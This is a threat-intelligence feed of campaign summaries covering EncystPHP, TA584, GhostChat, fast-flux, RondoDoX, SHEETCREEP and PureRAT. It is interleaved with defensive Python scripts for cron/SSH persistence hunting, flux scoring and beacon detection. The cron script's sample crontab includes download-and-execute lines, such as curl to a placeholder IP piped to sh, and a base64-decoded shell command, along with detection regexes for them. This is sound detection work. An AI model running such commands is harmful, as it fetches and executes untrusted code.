LATEST THREAT INTELLIGENCE.

Unveiling the Weaponized Web Shell EncystPHP

Description: A sophisticated web shell named EncystPHP has been discovered targeting FreePBX systems via CVE-2025-64328. Associated with the hacker group INJ3CTOR3, the malware provides remote command execution, persistence and deployment of further web shells. The observed attack originated from Brazil and targeted an Indian technology company. EncystPHP maintains persistence by creating cron jobs, injecting SSH keys and deploying multiple copies of itself, and it evades detection by deleting logs and masquerading as legitimate FreePBX files. The impact includes full system compromise, unauthorized administrative access and potential abuse of telephony resources. Organizations are advised to treat any successful exploitation as a critical incident requiring immediate remediation and hardening.
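The two persistence techniques named above (cron jobs and injected SSH keys) are the ones a responder can hunt for from disk alone. The script below is an added illustration, not code from the report or from the malware: it flags cron entries that download-and-execute, decode base64 or run a hidden .php file, and it reports authorized_keys entries whose SHA256 fingerprint is not in an approved set. The crontab, the key lines and the "hidden .cache.php under the FreePBX admin tree" path are constructed samples that imitate the described behaviour; they are not real EncystPHP artefacts.

```python
import base64
import hashlib
import re

# Constructed sample of a system-wide crontab (minute hour dom mon dow user command).
# The entries imitate the techniques described in the write-up; none are real
# EncystPHP artefacts and the paths are invented.
SAMPLE_CRONTAB = """\
# /etc/crontab: constructed sample
17 *  * * *  root      cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  asterisk  php /var/www/html/admin/modules/framework/.cache.php
*/10 * * * * root      curl -s http://198.51.100.7/x.sh | sh
0 3   * * *  root      /usr/bin/certbot renew --quiet
* * * * *    root      echo aWQ= | base64 -d | sh
"""

# Each pattern is paired with the reason reported when it matches the command part.
CRON_INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download-and-execute pipeline"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded command"),
    (re.compile(r"(^|[\s=])(/tmp|/var/tmp|/dev/shm)/"), "runs from a world-writable directory"),
    (re.compile(r"/\.[^/\s]+\.php\b"), "hidden .php file executed from cron"),
]


def suspicious_cron_entries(crontab_text):
    """Return [(line_no, reasons, command)] for cron entries matching any indicator."""
    hits = []
    for line_no, line in enumerate(crontab_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 6)  # 5 time fields, user, then the command
        if len(fields) < 7:
            continue  # malformed line or per-user crontab format (no user field)
        command = fields[6]
        reasons = [why for rx, why in CRON_INDICATORS if rx.search(command)]
        if reasons:
            hits.append((line_no, reasons, command))
    return hits


def _fake_blob(label):
    """Constructed, syntactically valid base64 stand-in for a key blob (not a real key)."""
    return base64.b64encode(b"constructed-key-blob:" + label.encode()).decode()


# Constructed authorized_keys content: two approved keys and one injected key.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "ssh-ed25519 " + _fake_blob("admin") + " admin@freepbx",
    'from="10.0.0.0/8",no-pty ssh-rsa ' + _fake_blob("backup") + " backup@nas",
    "ssh-ed25519 " + _fake_blob("injected") + " root@localhost",
])


def ssh_fingerprint(key_line):
    """SHA256 fingerprint in OpenSSH's notation, computed from the base64 key blob.

    Leading options are skipped by looking for the key-type token; options whose
    quoted values contain whitespace are not handled by this simple split.
    """
    parts = key_line.split()
    for i, token in enumerate(parts):
        if token.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
            digest = hashlib.sha256(base64.b64decode(parts[i + 1])).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("no key material found in line")


def unexpected_ssh_keys(authorized_keys_text, known_fingerprints):
    """Return [(line_no, fingerprint, comment)] for keys not in the approved set."""
    unexpected = []
    for line_no, line in enumerate(authorized_keys_text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fp = ssh_fingerprint(line)
        if fp not in known_fingerprints:
            unexpected.append((line_no, fp, line.split()[-1]))
    return unexpected


if __name__ == "__main__":
    for line_no, reasons, command in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron line %d: %s -> %s" % (line_no, ", ".join(reasons), command))
    approved = {ssh_fingerprint(l) for l in SAMPLE_AUTHORIZED_KEYS.splitlines()[:2]}
    for line_no, fp, comment in unexpected_ssh_keys(SAMPLE_AUTHORIZED_KEYS, approved):
        print("authorized_keys line %d: unknown key %s (%s)" % (line_no, fp, comment))
```

On a live system the approved fingerprint set should come from a baseline taken before the incident window (or from configuration management), and the same checks belong on every user's crontab and `~/.ssh/authorized_keys`, not only the system-wide files; a file's mtime being older than the compromise proves nothing, since the write-up notes the malware tampers with logs and disguises itself as FreePBX files.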

Created at: 2026-01-28T18:26:17.029000

Updated at: 2026-01-28T21:21:20.901000

Can't stop, won't stop: TA584 innovates initial access

Description: TA584, a prominent initial access broker targeting organizations globally, changed its attack strategies significantly throughout 2025. The actor expanded its global targeting, adopted ClickFix social engineering techniques and began delivering a new malware family called Tsundere Bot. Its operational tempo increased, with monthly campaign counts tripling between March and December. Delivery is by email through various methods, often from compromised individual accounts. TA584 now runs campaigns in rapid succession, often overlapping, each with a distinct lure theme and a short operational lifespan. Its adaptability in social engineering, brand impersonation and payload delivery makes static detection less effective. Recent payloads include XWorm with the 'P0WER' configuration and the newly observed Tsundere Bot, both likely sold as Malware-as-a-Service.

Created at: 2026-01-28T18:26:15.886000

Updated at: 2026-01-28T21:18:10.650000

Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan

Description: A sophisticated Android spyware campaign targeting individuals in Pakistan has been uncovered, using romance scam tactics as a lure. The malicious app, named GhostChat, poses as a chat platform with fake female profiles, requiring hardcoded passcodes to access. Once installed, it enables covert surveillance and data exfiltration. The campaign is part of a broader spy operation, including a ClickFix attack compromising victims' computers and a WhatsApp device-linking attack gaining access to victims' accounts. These related attacks used websites impersonating Pakistani governmental organizations. The threat actor employs multiple tactics across mobile and desktop platforms, blending social engineering, malware delivery, and espionage techniques.

Created at: 2026-01-28T18:26:16.374000

Updated at: 2026-01-28T21:14:11.115000

Infrastructure of Interest: Medium Confidence Detection

Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.

Created at: 2025-08-07T07:39:42.586000

Updated at: 2026-01-28T21:02:05.918000

Infrastructure of Interest: Medium Confidence FastFlux

Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs in this pulse are associated with fast-flux networks, which rotate IP addresses and DNS records continuously to evade detection while keeping phishing, malware delivery or C2 infrastructure resilient. Use this data to enhance DNS-based detection rules, identify flux parent domains and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
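The pulse describes the fast-flux signature (many IPs, rotated on short TTLs) and suggests working back to flux parent domains. The following is an added example of that heuristic, not LevelBlue's detection code: it aggregates passive-DNS style observations per hostname and per parent domain, counts distinct IPs and distinct /16 networks (a stand-in for ASN diversity, which would need an offline ASN database), takes the median TTL, and flags names that exceed all three thresholds. The observations, domain names and thresholds are constructed for illustration; a CDN-like name with many IPs in one network is included to show why IP count alone is not enough.

```python
import ipaddress
import statistics
from collections import defaultdict

# Constructed passive-DNS style observations: (name, resolved IPv4, TTL seconds).
# Invented to exercise the heuristic; not indicators from the pulse.
OBSERVATIONS = [
    # two hosts under one parent: each alone looks modest, together they show the pool
    ("a.flux.example", "198.51.100.10", 60), ("a.flux.example", "203.0.113.45", 60),
    ("a.flux.example", "192.0.2.77", 60),    ("a.flux.example", "100.64.9.1", 60),
    ("b.flux.example", "198.18.5.9", 120),   ("b.flux.example", "198.19.200.3", 60),
    ("b.flux.example", "203.0.113.45", 60),  ("b.flux.example", "100.64.3.21", 60),
    # CDN look-alike: several IPs and a short TTL, but all inside one network
    ("cdn.example", "203.0.113.1", 30), ("cdn.example", "203.0.113.2", 30),
    ("cdn.example", "203.0.113.3", 30), ("cdn.example", "203.0.113.4", 30),
    ("cdn.example", "203.0.113.5", 30), ("cdn.example", "203.0.113.6", 30),
    # stable host
    ("static.example", "192.0.2.1", 3600), ("static.example", "192.0.2.1", 3600),
]


def parent_domain(name):
    """Registrable-parent approximation: the last two labels (no public-suffix list offline)."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:])


def flux_features(observations, prefix_len=16):
    """Aggregate per name: distinct IPs, distinct /prefix_len networks, median TTL."""
    ips, nets, ttls = defaultdict(set), defaultdict(set), defaultdict(list)
    for name, ip, ttl in observations:
        net = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
        ips[name].add(ip)
        nets[name].add(str(net))
        ttls[name].append(ttl)
    return {
        name: {
            "unique_ips": len(ips[name]),
            "unique_networks": len(nets[name]),
            "median_ttl": statistics.median(ttls[name]),
        }
        for name in ips
    }


def is_flux(feat, min_ips=5, min_networks=3, max_ttl=300):
    """Fast-flux heuristic: many IPs spread over many networks, rotated on short TTLs."""
    return (feat["unique_ips"] >= min_ips
            and feat["unique_networks"] >= min_networks
            and feat["median_ttl"] <= max_ttl)


def flux_report(observations):
    """Score each hostname and each parent domain; return (flagged, per_host, per_parent)."""
    per_host = flux_features(observations)
    per_parent = flux_features([(parent_domain(n), ip, ttl) for n, ip, ttl in observations])
    flagged = {n for n, f in per_host.items() if is_flux(f)}
    flagged |= {p for p, f in per_parent.items() if is_flux(f)}
    return flagged, per_host, per_parent


if __name__ == "__main__":
    flagged, per_host, per_parent = flux_report(OBSERVATIONS)
    for name, feat in sorted(per_parent.items()):
        print(name, feat, "FLUX" if name in flagged else "")
```

Neither a.flux.example nor b.flux.example crosses the IP threshold on its own; the parent domain does, which is the "flux parent" the pulse asks analysts to identify. In production, replace the /16 proxy with ASN lookups and tune the thresholds against known CDN and anycast names, which legitimately show short TTLs and several addresses.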

Created at: 2025-08-07T07:34:03.778000

Updated at: 2026-01-28T21:01:04.406000

RondoDoX Botnet Weaponizes React2Shell

Description: A persistent nine-month RondoDoX botnet campaign has been targeting IoT devices and web applications. The threat actors recently shifted to weaponizing the critical React Server Components/Next.js remote code execution vulnerability known as React2Shell (CVE-2025-55182), using it to deploy bot payloads and cryptominers. The campaign, spanning March to December 2025, shows quick adaptation to the latest attack trends. The activity falls into three phases: initial reconnaissance, web application exploitation and IoT botnet deployment. The attackers use multiple command and control servers and deploy various malware variants. The campaign intensified in December 2025 with a focus on Next.js exploitation. The impact includes widespread IoT device compromise, risk to exposed Next.js applications, credential harvesting and persistent multi-architecture threats.

Created at: 2025-12-29T19:53:02.379000

Updated at: 2026-01-28T19:02:18.838000

APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP

Description: A new campaign targeting Indian government entities was uncovered, using three backdoors: SHEETCREEP, FIREPOWER and MAILCREEP. These tools use legitimate cloud services, namely Google Sheets, Firebase and the Microsoft Graph API, for command and control, so their traffic blends in with normal use of those services. The campaign, named Sheet Attack, used PDFs and malicious LNK files as initial infection vectors. Evidence suggests the use of generative AI in malware development. While it shares similarities with APT36, the campaign's distinct characteristics point to either a new Pakistan-linked group or an APT36 subgroup. The attackers demonstrated hands-on-keyboard activity and deployed additional payloads, including a document stealer, to selected targets.
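Because the C2 channels above terminate at Google, Firebase and Microsoft endpoints, domain reputation cannot separate the backdoors from legitimate use; what remains is the timing of the traffic. The script below is an added example, not the report's own detection logic: it reads constructed proxy log lines, groups them by (source host, destination), and flags pairs whose inter-arrival times are both numerous and regular (low coefficient of variation), the classic beacon profile. The log lines, host names and thresholds are invented for illustration; the destination hostnames are the real service endpoints the report names as C2 carriers.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log excerpt: "timestamp src_host dest_host". Invented traffic,
# not from the report. ws-114 polls sheets.googleapis.com about every 60 s with
# small jitter; ws-027 hits graph.microsoft.com at irregular, human-like gaps.
LOG_LINES = """\
2026-01-28T09:00:00 ws-114 sheets.googleapis.com
2026-01-28T09:00:12 ws-027 graph.microsoft.com
2026-01-28T09:00:15 ws-027 graph.microsoft.com
2026-01-28T09:01:01 ws-114 sheets.googleapis.com
2026-01-28T09:02:00 ws-114 sheets.googleapis.com
2026-01-28T09:02:59 ws-114 sheets.googleapis.com
2026-01-28T09:03:40 ws-027 graph.microsoft.com
2026-01-28T09:04:02 ws-114 sheets.googleapis.com
2026-01-28T09:05:00 ws-114 sheets.googleapis.com
2026-01-28T09:06:01 ws-114 sheets.googleapis.com
2026-01-28T09:07:00 ws-114 sheets.googleapis.com
2026-01-28T09:07:30 ws-114 www.example.com
2026-01-28T09:11:05 ws-027 graph.microsoft.com
2026-01-28T09:11:07 ws-027 graph.microsoft.com
2026-01-28T09:25:30 ws-027 graph.microsoft.com
2026-01-28T09:26:00 ws-027 graph.microsoft.com
"""


def parse_lines(text):
    """Group timestamps by (src, dst); each line is 'ISO-timestamp src dst'."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        events[(src, dst)].append(datetime.fromisoformat(ts))
    return events


def beacon_score(timestamps):
    """Return (mean interval in seconds, coefficient of variation) for the gaps."""
    times = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mean = statistics.mean(gaps)
    cv = statistics.stdev(gaps) / mean if mean else float("inf")
    return mean, cv


def find_beacons(text, min_events=6, max_cv=0.2):
    """Pairs with enough events whose inter-arrival times are regular enough to look machine-driven."""
    hits = {}
    for pair, ts in parse_lines(text).items():
        if len(ts) < min_events:
            continue  # too few samples to judge regularity
        mean, cv = beacon_score(ts)
        if cv <= max_cv:
            hits[pair] = {"events": len(ts), "period_s": round(mean, 1), "cv": round(cv, 3)}
    return hits


if __name__ == "__main__":
    for (src, dst), info in find_beacons(LOG_LINES).items():
        print(f"{src} -> {dst}: {info['events']} events, period {info['period_s']}s, cv {info['cv']}")
```

A real implementation would run this per hour over the full proxy feed and then baseline each destination across the fleet: a Sheets poll every minute from one workstation stands out only against the other hosts that talk to the same endpoint, and a backdoor that randomizes its sleep widely will need a different statistic (for example, the distribution of gaps rather than their variance).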

Created at: 2026-01-28T17:06:45.695000

Updated at: 2026-01-28T18:56:18.209000

PureRAT: Attacker Now Using AI to Build Toolset

Description: A Vietnamese threat actor is employing AI to develop code for an ongoing phishing campaign delivering PureRAT malware and other payloads. The attacks begin with phishing emails disguised as job opportunities, potentially targeting work computers. The attacker's use of AI is evidenced by detailed comments and numbered steps in scripts, as well as instructions in debug messages. The attack chain involves malicious archives, sideloaded DLLs, and batch scripts likely authored using AI. The attacker appears to be continually refining their methods and may be selling access to compromised organizations. This case demonstrates how AI can lower the barrier to entry for less skilled attackers, helping them write code and build attack toolkits.

Created at: 2026-01-28T17:20:03.077000

Updated at: 2026-01-28T18:47:16.887000

Weekly Threat Bulletin – January 28th, 2026

Description: This weekly threat bulletin highlights several critical vulnerabilities and emerging threats. A severe RCE vulnerability in React Server Components and Next.js (CVE-2025-55182) is being actively exploited. CISA added four critical flaws to its Known Exploited Vulnerabilities (KEV) catalog, including vulnerabilities in Versa Concerto, eslint-config-prettier, Zimbra Collaboration Suite and Vite. GitLab released patches for multiple high-severity vulnerabilities. A new macOS malware called MonetaStealer targets crypto wallets and financial data. Lastly, a critical RCE vulnerability in Oracle E-Business Suite (CVE-2025-61882) is being actively exploited by threat actors, including the Clop ransomware group.

Created at: 2026-01-28T13:31:30.733000

Updated at: 2026-01-28T15:45:53.935000

Pivoting From PayTool: Tracking Various Frauds and E-Crime Targeting Canada

Description: This investigation exposes a complex fraud ecosystem targeting Canadians through impersonation of government services and trusted brands. Attackers exploit digital dependencies for transportation, taxation, parcel delivery, and travel using convincing campaigns. The activity is linked to the 'PayTool' phishing framework, specializing in traffic violation scams. Additional infrastructure impersonates Canada Revenue Agency, Air Canada, and Canada Post. Threat actors commercialize these campaigns on underground forums, selling phishing kits mimicking official services. Victims are lured via SMS and malicious ads, using high-pressure tactics. The infrastructure employs fake validation phases and fraudulent payment gateways to harvest personal and financial data. The campaign's scope spans multiple provinces, utilizing shared hosting and domain generation patterns for scalability.

Created at: 2026-01-27T13:03:18.851000

Updated at: 2026-01-27T17:18:38.875000